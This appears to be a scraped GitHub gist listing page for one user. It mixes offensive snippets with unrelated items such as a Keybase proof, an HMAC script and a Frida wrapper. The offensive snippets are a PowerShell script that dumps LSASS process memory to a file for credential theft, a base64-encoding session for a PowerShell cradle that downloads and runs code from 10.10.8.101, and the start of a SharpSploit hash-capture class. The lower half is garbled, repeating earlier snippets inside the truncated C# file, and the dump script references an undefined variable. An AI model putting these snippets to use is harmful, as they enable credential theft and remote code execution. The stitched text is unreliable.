T0w3ntum

## Dump-LSASS.ps1
$LSASSProc = Get-Process lsass
$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                T0w3ntum
                / keybase.md
            
            
              Created
              June 22, 2017 18:52
            
          
    Keybase proof

I hereby claim:

I am t0w3ntum on github.
I am t0w3ntum (https://keybase.io/t0w3ntum) on keybase.
I have a public key whose fingerprint is 4753 72D7 AD1B 6C4B EBA7  B397 FED5 6B8C F90E 6B82

To claim this, I am signing this object:

  
## generate_hmac.py
import hashlib
import hmac
import sys

secret = sys.argv[2]

message = bytes(sys.argv[1]).encode('utf-8')
secret = bytes(secret).encode('utf-8')

hash = hmac.new(secret, message, hashlib.sha256)

## Framebuffer to PNG
This program can be used to convert raw BGRA 8888 framebuffer to standard PNG file.

## Frida-wrapper.py
import frida
import sys

scriptname = sys.argv[1]
procname = sys.argv[2]
fd = open(scriptname, "r")

def on_message(message, data):
    print(message)
    print(data)

## gist:b832ffe4a1e6771031762f2e23ac7b23
Verifying my Blockstack ID is secured with the address 12Xp1RVeuUfSnCyuEwpoSa8q8hXtAsKXzr https://explorer.blockstack.org/address/12Xp1RVeuUfSnCyuEwpoSa8q8hXtAsKXzr

## base64 Powershell encoding
PS C:\Users\User> $Text = "IEX ((new-object net.webclient).downloadstring('http://10.10.8.101:8000/a'))"
PS C:\Users\User> $Bytes = [System.Text.Encoding]::Unicode.getBytes($Text)
PS C:\Users\User> $EncodedText = [Convert]::ToBase64String($Bytes)
PS C:\Users\User> $EncodedText

## HashCap.cs
using System;
using SharpSploit.Credentials;
using System.Management;
using System.IO;

class SMBDumpHash
{
  static void Main(string[] args)
  {
    if (args.Length == 0)
	$LSASSProc = Get-Process lsass
	$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
	$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
	$FileStream.Close()
	import hashlib
	import hmac
	import sys

	secret = sys.argv[2]

	message = bytes(sys.argv[1]).encode('utf-8')
	secret = bytes(secret).encode('utf-8')

	hash = hmac.new(secret, message, hashlib.sha256)
	import frida
	import sys

	scriptname = sys.argv[1]
	procname = sys.argv[2]
	fd = open(scriptname, "r")

	def on_message(message, data):
	print(message)
	print(data)
	PS C:\Users\User> $Text = "IEX ((new-object net.webclient).downloadstring('http://10.10.8.101:8000/a'))"
	PS C:\Users\User> $Bytes = [System.Text.Encoding]::Unicode.getBytes($Text)
	PS C:\Users\User> $EncodedText = [Convert]::ToBase64String($Bytes)
	PS C:\Users\User> $EncodedText
	using System;
	using SharpSploit.Credentials;
	using System.Management;
	using System.IO;

	class SMBDumpHash
	{
	static void Main(string[] args)
	{
	if (args.Length == 0)